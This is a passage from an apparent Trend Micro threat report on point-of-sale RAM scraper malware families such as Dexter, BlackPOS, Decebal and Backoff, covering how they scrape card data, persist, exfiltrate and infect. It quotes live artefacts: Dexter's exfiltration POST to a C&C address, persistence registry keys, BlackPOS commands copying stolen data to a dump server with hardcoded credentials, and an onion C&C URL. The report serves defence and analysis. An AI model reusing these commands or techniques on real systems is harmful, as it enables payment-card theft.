and install a keylogger. [23] HKLM\SOFTWARE\Microsoft\Windows\
CurrentVersion\Internet Settings\
When first executed, Dexter follows an Zones\0\1806 value: 0
elaborate installation process. The sample
analyzed executed the following actions:
• Drops a keylogger component in
• Starts an Internet Explorer® process %WorkingDir%\SecureDll.dll
(i.e., iexplore.exe) in the background
Dexter then scrapes the process memory
• Injects itself into the spawned for Tracks 1 and 2 credit card data.
iexplore.exe process It inspects running processes via the
CreateToolhelp32Snapshot method that PoS
• Copies itself to %APPDATA%\Java RAM scrapers commonly use.
Security Plugin\javaplugin.exe
Dexter calls CreateToolhelp32Snapshot
• Adds the following Auto Start runkeys: to take a snapshot of all of the running
processes on the system as well as the
HKLM\SOFTWARE\Microsoft\Windows\ heaps, modules, and threads that they
CurrentVersion\Run\Sun Java use. It then calls Process32First, which
Security Value: %APPDATA%\Java retrieves information about the first process
Security Plugin\javaplugin.exe encountered in the snapshot. It also
maintains a blacklist of processes (e.g.,
HKCU\.DEFAULT\Software\Microsoft\ iexplore.exe, smss.exe, winlogon.exe, etc.)
Windows\CurrentVersion\Run\Sun to skip because finding credit card data in
Java Security Value: %APPDATA%\ the memory of these processes is highly
Java Security Plugin\javaplugin. unlikely. If a process is not in the blacklist,
exe Dexter opens the process object using
OpenProcess and reads the memory content
HKCU\Software\Microsoft\Windows\ via ReadProcessMemory.
CurrentVersion\Run\Sun Java
Security Value: %APPDATA%\Java Dexter uses a different method to search
Security Plugin\javaplugin.exe for Tracks 1 and 2 credit card data in the
process memory compared with other PoS
• Modifies the following RAM scrapers. Instead of using regex
LowRiskFileTypes registry key: matches, it uses a custom search function
that looks for identifier bytes, followed by
HKCU\Software\Microsoft\Windows\ the correct number of digits. It searches the
CurrentVersion\Policies\ read process memory in 64k-sized chunks.
Associations\LowRiskFileTypes Performing a custom search is faster than
value: .exe;.bat;.reg;.vbs; regex matching but can result in collecting
garbage data in addition to actual
• Modifies Internet Setting Zones Tracks 1 and 2 credit card data. Dexter’s goal
to blanket-permit all policies for is to be efficient rather than to collect quality

23
Trend Micro | PoS RAM Scraper Malware

information and exfiltrated data is validated is hardcoded in its binary. It has a constructor
offline. function that fills in preassigned variables
with exfiltrated data. The data is encoded as
In addition to Tracks 1 and 2 credit card a Base64 string and sent out as an HTTP
data, Dexter also collects system information POST request.
and logs keystrokes. It installs a keylogger
component, SecureDll.dll, in the current The following is a sample HTTP POST
%WorkingDir%. It enables the hidden file request that Dexter sends:
attribute on SecureDll.dll so it will not be
visible in Windows® Explorer. SecureDll.dll Connection: 63.165.250.100:80
exports the following functions: Content: POST/w1921831741862103104
1543/gateway.php HTTP/1.1\r\
• KeyloggerDll_1 nContent-Type: application/x-www-
form-urlencoded\r\nUser-Agent:
Mozilla/4.0[compatible; MSIE 7.0b;
• KeyloggerDll_2
Windows NT 6.0]\r\nHost: www.w1n4.
com\r\nContent-Length: 173\r\
KeyloggerDll_* functions call the nCache-Control: no-cache\r\n\r\=
GetKeyboardState API, which returns the WltXUFZbAFdOVFVTUk5XWgdXTgIFUlpO
status of the 256 virtual keys to a specified AAZWUQEHVQVWBVoG&unm=IgcOCg0KEBc
buffer. Dexter calls LoadLibrary to load the RAhcMEQ==&cnm=BwBOBQoPBhARFQ==&
functions that SecureDll.dll exports and query=NAoNBwwUEEM7Mw==&spec=UFF
calls SetWindowsHookEx to hook handlers, DIQoX&opt=Ww&var=MBcCEScWEBc=&val=
WH_KEYBOARD (i.e., monitor keyboard c3ltY2c=
input) and WH_GETMESSAGE (i.e., monitor
mouse and keyboard input). These allow The following table shows the variables that
Dexter to intercept all of the keystrokes made Dexter uses in HTTP POST requests. [24], [25]
on infected systems.

Dexter uses HTTP POST to exfiltrate data


and send it to a C&C server whose address

HTTP POST Parameters That Dexter Uses

Variable Value

page Mutex

ump Track data

ks Keylogger

opt Unknown

unm Username

24
Trend Micro | PoS RAM Scraper Malware

HTTP POST Parameters That Dexter Uses

Variable Value

cnm Hostname

view Running processes

spec Architecture

query OS

val Base64 XOR key

var Dexter identifier

Dexter also has bot functionality. The Dexter can process.


following table shows the bot commands that

Bot Commands That Dexter Can Process

Command Description

download- Downloads and executes <parameter>

update- Updates the malware

Changes the time intervals between data


checkin-
submissions

scanin: Changes the time intervals between memory scans

uninstall Serves as a kill switch; uninstalls the malware

Dexter is one of the most potent PoS RAM This is very dangerous in a corporate
scraper families because its data-theft environment because it can steal sensitive
activities are not limited to only stealing credit corporate information entered into PoS
card data. It also steals system information systems. [26]
and installs a keylogger on infected systems.

25
Trend Micro | PoS RAM Scraper Malware

Figure 19: Dexter captures running processes using the CreateToolhelp32Snapshot method and checks
a blacklist for processes to skip

Figure 20: Dexter ignores blacklisted processes

Figure 21: Custom search function that Dexter applies to 64k-sized chunks of memory

26
Trend Micro | PoS RAM Scraper Malware

Figure 22: Custom search function that Dexter uses to look for identifier bytes

Figure 23: KeyloggerDll_1—one of the functions that SecureDll.dll exports

27
Trend Micro | PoS RAM Scraper Malware

Dexter Files Analyzed

SHA-1 Trend Micro Detection Name

f07f40f0b17a4d282e1c55b3a23b331b1f78c4d0
BKDR_DEXTR.SMM
a8bb7ce5e8616241a268666cd07926938dfbbe44

32ed9f0beae53f1928bf5727111efbf81df9ac96 TSPY_DEXTER.CA

408d63a01e8e111181db921f1bf603e1a76622cf TROJ_PINCAV.TF

BlackPOS process. It reads the process memory using


ReadProcessMemory.
BlackPOS is probably the most well-known
PoS RAM scraper due to its role in the
massive breach targeting one of the biggest
U.S. retailers between 27 November and
15 December in 2013. [27] A BlackPOS
variant was used to steal the payment card
data of 70 million customers across the
country. [28] Selling the stolen card and
other customer data is expected to generate
an income of US$53.7 million for the
cybercriminals. [29], [30] BlackPOS is actually
an old malware, first discovered around
the middle of 2012. Its source code was
leaked online at some point, which led to the
Figure 24: BlackPOS’s custom search function
creation of several BlackPOS variants with
different functionality. [31] BlackPOS searches the process memory
using one of two methods. In the first
BlackPOS enumerates all of the processes
method, it uses a custom search function
running on the infected system using the
that searches the full process memory for
EnumProcesses method and scans the
identifier bytes, followed by the correct
process memory for Tracks 1 and 2 credit
number of digits, and writes the data that
card data.
it scrapes to a file on disk. In the second
method, it applies the custom search
BlackPOS calls EnumProcesses, which
function to only x bytes of process memory
populates an array with a list of process
at a time. It repeats this search until the
identifiers. It iterates over this array. For each
entire memory space of the process is
array element, it calls OpenProcess to get
inspected. This custom search function is
the process handle then calls VirtualQueryEx
faster than matching regexes but can lead
to retrieve information about a range of
to the collection of garbage data in addition
pages within the virtual address space of the
to the actual Tracks 1 and 2 credit card

28
Trend Micro | PoS RAM Scraper Malware

data. Similar to Dexter, BlackPOS’s goal is message body, meanwhile, uses the
to be efficient rather than to collect quality greeting, “Hi Buddy.”
information and exfiltrated data is validated
offline. • Exfiltration via direct FTP
upload: This can be done without
The original BlackPOS malware is a simple affected users’ knowledge. The
command line tool that supports user-defined FTP credentials, hardcoded in the
search patterns. This makes BlackPOS a BlackPOS binary, are used to log in
flexible tool that can search for all kinds of to a remote FTP server and to upload
pattern in the process memory space without the text file with the stolen credit card
requiring code modification. data.

The credit card data found in the process • Exfiltration via file copy to a remote
memory can be seen on a command window server: The BlackPOS variant
or written to a file on disk. The sample we used in the Target credit card data
analyzed dumps the data in a file called breach dropped the stolen data in
“output.txt.” a text file called “winxml.dll” in the
%WINDIR%\<system32> directory.
There is a seven-hour sleep cycle
after which the malware copies the
data that it collects to a compromised
dump server on the same network
using the following system
commands:

%windir%\system32\cmd.exe/cnet
use S:\\10.116.240.31\c$\WINDOWS\
Figure 25: Sample credit card data that twain_32/user:ttcopscli3acs\Best1_
BlackPOS finds user BackupU$r

Writing search results to a file on disk is


common across all of the BlackPOS variants %windir%\system32\cmd.exe/c move
C:\WINDOWS\system32\winxml.dll
analyzed. This allows cybercriminals to
S:\<filename>.txt
exfiltrate the stolen data in various ways. The
following are some of the exfiltration methods
discovered: %windir%\system32\cmd.exe/c S:/del

• Exfiltration via email: The An uploader running on the


executable file, 1.exe, is a command compromised dump server uploads
line email client. 2.exe is the the stolen data to a remote FTP
BlackPOS RAM scraper that is server. This can be detected by IT
executed in an infinite loop in the administrators who monitor FTP
batch script. The output.txt file is traffic.
then emailed to an icloud.com email
address from a gmail.com email BlackPOS is a simple PoS RAM scraper that
address. The email has Transport has been successfully used in numerous
Layer Security (TLS) enabled in order data breach attacks. Its leaked source
to encrypt the message’s content. The code allows cybercriminals to easily add
email uses “Resultz” as subject. The functionality to the base malware. Support

29
Trend Micro | PoS RAM Scraper Malware

for custom patterns to search the process of BlackPOS’s features make it a successful
memory means that BlackPOS can steal a data breach tool. Its success, unfortunately,
wide range of data. The results are always means that it will further evolve and be used
written to a text file that can be exfiltrated in more data breach attacks in the future.
using the method above, among others. All

METHOD 1 METHOD 2

EnumProcesses
OpenProcess EnumProcesses

AProcesses[I] AProcesses[I]

OpenProcess OpenProcess

ReadProcessMemory ReadProcessMemory

Custom_Search_Func Use X bytes

Proceed_
Write_Data_To_File Custom_Search_Func to_next_X

Yes Write_Data_To_File No

Searched_all_
Memory?

Figure 26: EnumProcesses method flowchart

30
Trend Micro | PoS RAM Scraper Malware

Figure 27: BlackPOS’s command line options

Figure 28: BlackPOS can exfiltrate data via email

Figure 29: BlackPOS can exfiltrate data via FTP upload

31
Trend Micro | PoS RAM Scraper Malware

Figure 30: BlackPOS can copy a data file to a compromised dump server that resides on the same
network

BlackPOS Files Analyzed

SHA-1 Trend Micro Detection Name

e9239277190ea33470738ddf3aa48a0a41c4753b
TSPY_POCARDL.SM
b20d49115653946ae689d0d572fdfc483ea04cc5

8a6af8587adf0e743871ad6b9889428b5f75b86b TSPY_POCARDL.AB

71983a80541ec714d59fb91575f6bfd4fcdda8b1 TSPY_POCARDL.U

32
Trend Micro | PoS RAM Scraper Malware

Decebal OpenProcess and reads the memory content


via ReadProcessMemory. Regexes to match
Tracks 1 and 2 credit card data are run on
Decebal refers to a PoS RAM scraper the process memory content that Decebal
malware family first discovered at the reads. The sample analyzed only has a regex
beginning of 2014. [32] Decebal is unique in to match Track 2 credit card data although its
that it is coded in VBScript and is compiled source code can be easily modified to match
into an executable file. Most PoS RAM both Tracks 1 and 2 data.
scrapers are coded in C, C++, or Delphi. Like
BlackPOS, Decebal’s source code was also Decebal has a built-in Luhn-validation
leaked online. Decebal comes with many mechanism. The results returned by regex
existing functionality found in established matching are validated to make sure that the
and even new PoS RAM scraper malware Track data that it scrapes from the process
families. memory contains valid credit card numbers.
On startup, Decebal checks for installed Decebal exfiltrates stolen data by making
sandboxing and reverse-engineering tools on connection requests to a remote server via
infected systems to evade detection. If any is InternetOpenUrl. The data is exfiltrated in
discovered, it will terminate its process. the HTTP header that is sent to the remote
server. The SendPHP() subroutine constructs
After determining the nonexistence of a special URL that contains hexadecimal-
sandboxing or debugging tools, Decebal encoded values for the following information:
installs itself in %USERPROFILE% as
iexplorer.exe. It then audits infected systems • &co: Computer name
in order to determine their OS, computer
name, and username. • &us: Username

Decebal also retrieves the name of any • &av: Installed anti-malware solution
anti-malware solution installed on infected name
systems. This information is exfiltrated to a
remote server, along with the stolen Tracks 1 • &os: OS
and 2 credit card data.
• &tr2: Track 2 credit card data
Decebal inspects all of the running
processes using a slightly modified version The remote server runs a simple PHP script
of the CreateToolhelp32Snapshot method to monitor incoming connection requests.
that PoS RAM scrapers commonly use. It
calls CreateToolhelp32Snapshot to take a The servers strip out the variables from the
snapshot of all of the running processes HTTP headers that it receives and converts
on infected systems, along with the heaps, the hexadecimal-encoded values into strings
modules, and threads that they use. It then and writes them to a text file.
calls Process32Next inside a do-while
loop. [33] Decebal maintains a blacklist of Decebal infects systems via drive-by-
processes (e.g., svchost.exe, csrss.exe, download attacks or by luring potential
wininit.exe, etc.) to skip because finding victims to compromised websites. It can also
credit card data in the memory of these be dropped by other malware. The leaked
processes is highly unlikely. If a current source code means that, like BlackPOS,
process being inspected is not in the it can be easily modified to add new
blacklist, it opens the process object using functionality for use in data breach attacks.

33
Trend Micro | PoS RAM Scraper Malware

Figure 31: Decebal checks for the presence of debugging tools

Figure 32: Decebal audits infected systems

Figure 33: Decebal checks for anti-malware solutions

Figure 34: Decebal uses the CreateToolhelp32Snapshot method to search for Track 2 credit card data

34
Trend Micro | PoS RAM Scraper Malware

Figure 35: Decebal’s built-in Luhn-validation mechanism

Figure 36: Decebal uses HTTP headers to exfiltrate stolen data

35
Trend Micro | PoS RAM Scraper Malware

Figure 37: Decebal’s server-side code

Decebal Files Analyzed

SHA-1 Trend Micro Detection Name

1f3d59d4e537911f7719e2b5f55723a7e7bfae88

8d8dca6aed3d6688910a3bbedd1ce562e45d9ac4 TSPY_DECBAL.A

42e55bfad0677cc810cfb08a4cf4cf668725b3c8

36
Trend Micro | PoS RAM Scraper Malware

NEXT-GENERATION PoS RAM SCRAPERS

PoS RAM scraper attacks are still prevalent, This watchdog ensures that the JackPOS
as evidenced by all of the new malware process is always running. If the process is
families that are constantly being discovered. not running or is terminated, the watchdog
Recently discovered families show that the spawns a new JackPOS process.
next generation of PoS RAM scrapers are
extensively reusing ideas and functionality JackPOS uses the
seen in already-existing families, along with CreateToolhelp32Snapshot method to
new feature additions. inspect all running processes for Tracks 1
and 2 credit card data. Like Alina, it maintains
JackPOS a blacklist of processes to skip. Instead of
using regex matching, JackPOS uses a
custom search function to look for identifier
JackPOS is an Alina-inspired PoS RAM bytes, followed by the correct number of
scraper family first discovered at the digits, in order to find Tracks 1 and 2 credit
beginning of 2014. [34], [35] It does not card data in the process memory. It exfiltrates
share a code base with Alina but heavily the stolen data using HTTP POST and
borrows ideas and functionality from the Base64-encodes the content. It also sends
latter. When first executed, JackPOS installs infected systems’ MAC addresses to C&C
itself on the %APPDATA% directory. Like servers, possibly using them as identifiers. It
Alina, JackPOS maintains a list of socially also has a bot functionality and can process
engineered filenames, all related to Java™, commands such as the following:
and installs itself using a filename from
the said list. It also adds itself to an Auto • update: Update itself
Start runkey to maintain persistence. It also
drops a watchdog program in %TEMP%. • kill: Remove itself (kill switch)

JackPOS Files Analyzed

SHA-1 Trend Micro Detection Name

9d78ff3123e485eda287aed83c1c2dc9d3de02d5

a6916594f407c1d2cc794146d90062fc8e6dcd98

2f3d2d6a28a2532267f8f6affd8e70d203f0d00d TSPY_JACKPOS.A

9c0117a66cf460bdb0cc211a4f13a170cc88b4f7

5cad762578ba264f677d83b8ecd84158b264f9ef

37
Trend Micro | PoS RAM Scraper Malware

Soraya also has a built-in Luhn-validation method.


The search results are validated to ensure
that the Tracks 1 and 2 credit card data that
Soraya is a Dexter-and-ZeuS-inspired it scrapes from the process memory contains
PoS RAM scraper variant first discovered valid credit card numbers.
in June 2014. [36] It is custom-packed to
obfuscate its code and to make it difficult for Soraya also borrowed ZeuS’s form-grabbing
security researchers to reverse-engineer its functionality. After injecting itself into a
binary. When first executed, Soraya injects process, Soraya checks if the process is
its code into several running processes. for Web browsing. If it is, Soraya hooks the
It borrowed tricks from ZeuS and hooks browser’s function responsible for sending
the NtResumeThread API, which is called HTTP POST requests. It can hook the HTTP
by Windows to execute new processes. It POST function in Internet Explorer, Firefox,
then injects its code into all newly created and Chrome. All of the POST data the
processes. It also copies itself to the browsers send is captured. Form grabbing
%APPDATA% directory and adds itself to an allows Soraya to steal victims’ credentials
Auto Start runkey to remain persistent. and other confidential information used in
online banking. It exfiltrates the following to
Soraya iterates over all running processes C&C servers via HTTP POST:
using the same method that Dexter does.
It maintains a blacklist of processes to skip • System information
when scanning. Instead of using regex
matching, it uses a custom search function • Tracks 1 and 2 credit card data
to look for identifier bytes, followed by the
correct number of digits, to find Tracks 1 and • Raw POST data
2 credit card data in the process memory. It

Soraya Files Analyzed

SHA-1 Trend Micro Detection Name

0BE287EEFE96EE1519A37A0F6C6A547EF043E80E
TSPY_SORAYA.A
E70F9BADB8C97296B11732B63B4E512640249712

ChewBacca application—in %TEMP%. It then hooks WH_


KEYBOARD_LL, which monitors keyboard
input events. This allows ChewBacca to
ChewBacca is a PoS RAM scraper family, capture all keyboard events, which are then
first discovered at the end of 2013, which logged to %TEMP%\system.log. [39]
uses the Tor network to exfiltrate stolen data.
[37], [38] When first executed, ChewBacca ChewBacca uses the
copies itself to %USERPROFILE%\START CreateToolhelp32Snapshot method to
MENU\Programs\Startup\spoolsv.exe inspect all running processes for
and adds itself to an Auto Start runkey to Tracks 1 and 2 credit card data. Instead
remain persistent. It is self-contained and of regex matching, it uses a custom
installs obfsproxy v0.2.3.25—a Tor proxy search function that looks for identifier

38
Trend Micro | PoS RAM Scraper Malware

bytes, followed by the correct number encrypts all traffic by default. The sample
of digits, in order to find Tracks 1 and 2 analyzed accessed the C&C server,
credit card data in the process memory. http :// 5ji235jysrvwfgmb . onion /, which uses a
It then retrieves victims’ IP addresses .onion pseudo-top-level domain (TLD). Note
by visiting http :// ekiga . net / ip / and then that a .onion TLD cannot be resolved outside
establishes a Tor circuit for anonymity. Tor the Tor network and can only be accessed by
conceals C&C servers’ IP addresses and using a Tor proxy application.

ChewBacca Files Analyzed

SHA-1 Trend Micro Detection Name

0392F25130CE88FDEE482B771E38A3EAAE90F3E2 TSPY_FYSNA.A

BrutPOS BrutPOS scans and attacks specified IP


ranges, which implies that the cybercriminals
behind it select targets instead of launch
BrutPOS, first discovered in July 2014, attacks at random. It has been known to
appears to have borrowed ideas and target U.S. companies in the food services
functionality from BlackPOS and Rdasrv. industry. Like other PoS RAM scrapers,
[40] It is custom-packed to obfuscate its
BrutPOS also has the following features:
code and to make it difficult for security
researchers to reverse-engineer its binary. • Multiple components
It attempts to exploit PoS systems that use
weak or default passwords with open Remote • Process exclusion list
Desktop Protocol (RDP) ports. [41] Note that
using weak or default passwords means • Custom search function
noncompliance to mandatory PCI DSS
requirements for merchants that process • Luhn validation
credit card transactions. BlackPOS carried
out RDP password brute-forcing attacks back • Bot functionality
in 2013. BrutPOS has adopted this attack
strategy to infiltrate systems. • Exfiltration of stolen Tracks 1 and 2
credit card data via FTP
Like Rdasrv, BrutPOS targets known PoS
system software (e.g., MICROS RES).

BrutPOS Files Analyzed

SHA-1 Trend Micro Detection Name

fb357bb5d9c2de75afa69bfec8c22041b02e03df TROJ_TIBRUN.B

39
Trend Micro | PoS RAM Scraper Malware

BrutPOS Files Analyzed

SHA-1 Trend Micro Detection Name

2cf34b70906779c9e230c5ffce4179f4f58eea5a
TROJ_TIBRUN.SM
11b7430026c82097657c145dcedfa818bf1032d3

Backoff txt. Backoff exfiltrates stolen data using


HTTP POST and uses RC4 and Base64 to
encode content. It also takes inspiration from
Backoff is also an Alina-inspired family of Dexter, as it implements an elaborate POST
PoS RAM scrapers discovered in July 2014. message schema that retrieves the following
[42], [43] It is custom-packed to obfuscate
information from infected systems:
its code and to make it difficult for security
researchers to reverse-engineer its binary. • Unique bot ID
When first executed, it copies itself to
%APPDATA%\ORACLEJAVA\javaw.exe. • Usernames/Hostnames
It then launches the copy in %APPDATA%
using the -m <path_to_original_Backoff> • Windows OS version
parameter. This terminates the original
Backoff process and deletes the associated • Malware version
file on infected systems’ disk. We have seen
Alina use this installation technique. Backoff Backoff also has bot functionality and can
also adds itself to an Auto Start runkey to process the following commands, among
remain persistent. It injects a watchdog stub others:
into explorer.exe to ensure that its process
constantly runs. If the Backoff process is not • Update
running or terminated, the watchdog stub
decrypts and reinstalls a stored copy of the • Download
malware.
• Run
Backoff uses the CreateToolhelp32Snapshot
method to inspect all running processes for • Upload KeyLogs
Tracks 1 and 2 credit card data. Like Alina,
Backoff does not spread via exploit, phishing,
it also maintains a blacklist of processes to
drive-by-download, and other attacks. It
skip when scanning. And instead of regex
borrowed a BrutPOS infection technique
matching, it uses a custom search function
instead. Cybercriminals use publicly available
to look for identifier bytes, followed by the
tools to identify companies that use remote
correct number of digits, to find Tracks 1 and
desktop applications on their PoS systems
2 credit card data in the process memory.
and attempt to brute-force their login features
Backoff also has keylogging functionality. It
in order to gain entry into these PoS systems.
calls the GetKeyState and GetKeyboardState
Once entry is gained, systems are infected
APIs to capture keyboard inputs and logs
with Backoff. [44], [45], [46]
them to %APPDATA%\ORACLEJAVA\Log.

40
Trend Micro | PoS RAM Scraper Malware

Backoff Files Analyzed

SHA-1 Trend Micro Detection Name

2cf34b70906779c9e230c5ffce4179f4f58eea5a
TSPY_POSLOGR.A
11b7430026c82097657c145dcedfa818bf1032d3

caf546e3ee1a1d2768ec37428de1ff7032beea94 TSPY_POSLOGR.B

85e9fcc38b1683f94e12a438cbea17679bb8b724
TSPY_POSLOGR.C
66c83acf5b852110493706d364bea53e48912463

41
Trend Micro | PoS RAM Scraper Malware

WHAT WILL THE NEXT GENERATION OF


POS RAM SCRAPERS LOOK LIKE?

Predicting what the next generation of malware reuse tried-and-tested functionality.


malware families will look like is tricky The functionality presented in this paper
because coders constantly modify their was then grouped into the following distinct
techniques and approaches to evade categories:
detection, to implement new functionality or
features, and to improve infection success • General characteristics
rates. Malware coders are also not bound by
any code of conduct and ethics as well as • Data-collection techniques
by infringement laws. They liberally borrow
functionality or features from others’ codes • Data-exfiltration techniques
as long as these can help them achieve their
nefarious goals. To get a better perspective of the evolution
of PoS RAM scrapers, the malware families
Despite the predicaments above and given were organized by year of discovery. Note
the narrow scope of the problem studied, that a malware variant may have existed long
reasonable predictions about the next before it was discovered because tracking
generation of PoS RAM scrapers were exact dates is extremely difficult to do. Almost
still made. The approach used involved four years’ worth of PoS RAM scrapers were
identifying common PoS RAM scraper traits available to study for traits.
and observing how recently discovered

PoS RAM Scraper Families

Year Discovered Malware Family

2011 Rdasrv

BlackPOS

2012 Alina

Dexter

VSkimmer
2013
ChewBacca

42
Trend Micro | PoS RAM Scraper Malware

PoS RAM Scraper Families

Year Discovered Malware Family

Decebal

JackPOS

Soraya
2014
BrutPOS

Backoff

BlackPOS ver. 2

General Characteristics RAM scraper families featured in this paper.


It includes installation techniques, bot
functionality, social engineering tactics, and
The following table lists the general similar attributes.
characteristics observed among the PoS

43
Trend Micro | PoS RAM Scraper Malware

General Characteristics of PoS RAM Scraper Families

Characteristic Rdasrv BlackPOS Alina Dexter VSkimmer ChewBacca Decebal JackPOS Soraya BrutPOS Backoff Number

Collects
system        7
information

Uses a
single        7
component

Uses socially
engineered       6
filenames

Updates
     5
itself

Has bot
     5
functionality

Uses
multiple     4
components

Is packed    3

Pretends to
   3
be Java

Has a kill
   3
switch

44
Trend Micro | PoS RAM Scraper Malware

General Characteristics of PoS RAM Scraper Families

Characteristic Rdasrv BlackPOS Alina Dexter VSkimmer ChewBacca Decebal JackPOS Soraya BrutPOS Backoff Number

Hooks APIs    3

Installs a
watchdog   2
process

Injects code   2

Attacks
systems
with weak   2
or default
password

Uses
multiple
 1
exfiltration
methods

45
Trend Micro | PoS RAM Scraper Malware

Overall, the following top general that search for specific patterns
characteristics of PoS RAM scrapers were or functionality for detection and
identified: blocking purposes.

• They collect and exfiltrate system • They collect system information.


information.
• They have bot functionality and can
• All of their functionality are packed receive commands from C&C servers.
into a single binary as opposed to
relying on multiple components to • They install a watchdog process to
infect systems. ensure persistence.

• They use socially engineered • They have a kill switch that allows
filenames when installed in order to them to remove themselves.
avoid drawing unwanted attention.
As shown, two of the top general
• They can update themselves. characteristics of PoS RAM scrapers
discovered in 2014 are present in the list of
• They have bot functionality and can top overall characteristics.
receive commands from C&C servers.
Data Collection
The following top general characteristics of
PoS RAM scrapers discovered in 2014 were
also identified: The following table lists the RAM-scraping
and other data-collection techniques
• They are custom-packed in order observed among the PoS RAM scraper
to obfuscate their code. This helps families featured in this paper.
them defeat anti-malware signatures

46
Trend Micro | PoS RAM Scraper Malware

Data-Collection Techniques That PoS RAM Scraper Families Use

Technique Rdasrv BlackPOS Alina Dexter VSkimmer ChewBacca Decebal JackPOS Soraya BrutPOS Backoff Number

Uses the
CreateToolhelp
       7
32Snapshot
method

Uses a
       7
blacklist

Has a custom
       7
search function

Uses regexes     4

Uses Base64
to encode data     4
for exfiltration

Stores results
   3
in logfiles

Performs Luhn
   3
validation

Logs
   3
keystrokes

Targets known
PoS systems   2
or applications

47
Trend Micro | PoS RAM Scraper Malware

Data-Collection Techniques That PoS RAM Scraper Families Use

Technique Rdasrv BlackPOS Alina Dexter VSkimmer ChewBacca Decebal JackPOS Soraya BrutPOS Backoff Number

Encrypts data
  2
for exfiltration

Encodes data
as hex digits   2
for exfiltration

Uses the Enum


Processes  1
method

48
Trend Micro | PoS RAM Scraper Malware

Overall, the following top data-collection • They use a blacklist to avoid scanning
techniques used by PoS RAM scrapers were processes wherein Tracks 1 and 2
identified: credit card data cannot be found.

• They use the • They look for Tracks 1 and 2 credit


CreateToolhelp32Snapshot method to card data using a custom search
iterate over all running processes. function.

• They use a blacklist to avoid scanning • They encode data as a Base64 string
processes wherein Tracks 1 and 2 in order to obfuscate their content.
credit card data cannot be found.
• They compute a Luhn checksum to
• They look for Tracks 1 and 2 credit validate the Tracks 1 and 2 credit card
card data using a custom search data that they scrape.
function—a fast method but does not
necessarily deliver quality results. As shown, four of the top data-collection
techniques PoS RAM scrapers discovered
• They search for Tracks 1 and 2 credit in 2014 use are in the overall list. Using
card data via regex matching, which the CreateToolhelp32Snapshot method,
is a slow process. blacklists, and custom search functions
have proven to be the most efficient way
• They encode data as a Base64 string of harvesting Tracks 1 and 2 credit card
in order to obfuscate their content. data from the process memory in infected
systems’ RAM.
The following top techniques among PoS
RAM scrapers discovered in 2014 were also Data Exfiltration
identified:

• They use the The following table lists the data-exfiltration


CreateToolhelp32Snapshot method to techniques observed among the PoS RAM
iterate over all running processes. scraper families featured in this paper.

49
Trend Micro | PoS RAM Scraper Malware

Data-Exfiltration Techniques That PoS RAM Scraper Families Use

Technique Rdasrv BlackPOS Alina Dexter VSkimmer ChewBacca Decebal JackPOS Soraya BrutPOS Backoff Number

Uses HTTP
     5
POST

Data is
manually   2
removed

Uses FTP
  2
servers

Uses HTTP
 1
GET requests

Sends stolen
data via HTTP  1
header

Uses Tor  1

Uses emails
or Simple
Mail Transfer  1
Protocol
(SMTP)

Uses network
 1
shares

50
Trend Micro | PoS RAM Scraper Malware

Data-Exfiltration Techniques That PoS RAM Scraper Families Use

Technique Rdasrv BlackPOS Alina Dexter VSkimmer ChewBacca Decebal JackPOS Soraya BrutPOS Backoff Number

Data is
exfiltrated via
 1
removable
devices

51
Trend Micro | PoS RAM Scraper Malware

It is clear from the table above that HTTP featured in this paper. Combining functionality
POST requests are the preferred data- from each distinct category allowed for
exfiltration method by both pre- and 2014 predicting the creation of dozens of working
PoS RAM scrapers. This is because HTTP next-generation PoS RAM scrapers. Note
POST requests are not cached, not saved that not all permutations will work. Innovative
in history, and have no restrictions on data- cybercriminals may figure out new ways to
sending length. exploit holes found in PCI DSS requirements
and how to breach systems by crafting new
The lists presented above are by no means data-gathering and -exfiltration techniques.
exhaustive, as they only contain functionality Even worse, these innovative features will
observed among the PoS RAM scrapers surely be quickly replicated by their peers.

52
Trend Micro | PoS RAM Scraper Malware

INFECTION METHODS

Using a Bag of “Old” Tricks • Identify and authenticate access to


system components.
Merchants and vendors, regardless of size, • Maintain policies that address
can be potential credit card data theft targets. information security for all personnel.
The easiest place to steal credit card data
is from the RAM of PoS systems where Small businesses do not frequently
it temporarily resides in plain text during enforce the requirements above, leaving
transaction processing. The challenge for themselves vulnerable to attacks. Even
cybercriminals is to find a reliable method in big corporations, very few things can
to infect PoS systems. They have been prevent disgruntled staff members from
achieving this using a variety of tried-and- intentionally infecting systems or servers that
tested methods such as social engineering, contain sensitive information. A hotel clerk,
lateral movement, and vulnerability for instance, could quietly plug an infected
exploitation, among others. USB key into a credit-card-processing
server at the front desk. Some PoS RAM
INSIDE JOBS scraper families such as VSkimmer include
functionality to dump the stolen data
Inside jobs are the most difficult infection directly in a text file in a USB stick, which
vector to protect against, as this involves implies insider jobs are not uncommon.
people that companies trust or who can PCI DSS requirements can deter but
abuse privileges to commit crime. [47] These cannot completely prevent inside jobs from
people could be disgruntled or disillusioned happening, as these ultimately rely on trust.
employees out to take revenge against their
employers or could just be unscrupulous PHISHING AND SOCIAL ENGINEERING
and are out to make some quick cash
by victimizing their employers. Some Phishing and social engineering attacks
cybercriminals have also been known to are tried-and-tested methods of infecting
bribe employees to deliberately plug infected systems with malware. PoS RAM scrapers
USB sticks into systems or servers that are never spammed to millions of potential
contain sensitive data in order to compromise victims. They are instead sent to chosen
them. targets via phishing emails with effective
social engineering lures. Besides, the attacks
The earliest PoS RAM scraper variants did will lose their edge if the malicious binaries
not have network functionality but they were used are made easily available. Security
discovered on semi-air-gapped PoS systems. companies can quickly identify threats and
[48] They then harvested credit card data that create generic signatures to stop them.
was dumped in simple text files that were Stealth is, therefore, a key characteristic of
collected afterward. This strongly indicates successful PoS attacks.
the possibility of an inside job. PCI DSS
requirements specify the following: Small businesses often use their PoS
systems to browse the Internet and to check

53
Trend Micro | PoS RAM Scraper Malware

emails, making them easy attack targets. Once installed, PoS RAM scrapers normally
Phishing emails generally deliver malware rename themselves using inconspicuous
payloads in the following ways: filenames to evade detection. Some of the
socially engineered filenames that PoS RAM
• As attachments: Some emails come scrapers use include the following:
with an attachment and use social
engineering lures in the message • java.exe
body to convince recipients to
download and open the attached file. • mmon32.exe
The attachments used are commonly
.ZIP files that contain a malicious • taskmgr.exe
executable file. The executable
files, meanwhile, are disguised as • adobeflash.exe
commonly used files (e.g., .DOC,
.PDF, .XLS, or other files). Some • windowsfirewall.exe
disguised executable files can also
PoS attacks that rely on phishing and social
be directly attached to emails instead
engineering usually succeed against small
of being archived. These files are
businesses with limited technical resources
usually droppers or downloaders that
or capabilities. But they are, in theory, less
stealthily install PoS RAM scrapers
effective against big companies that have
on systems. Another strategy could
proper operations security policies in place.
involve attaching malicious .PDF or
Of course, some big corporations have been
.DOC files to emails. When opened,
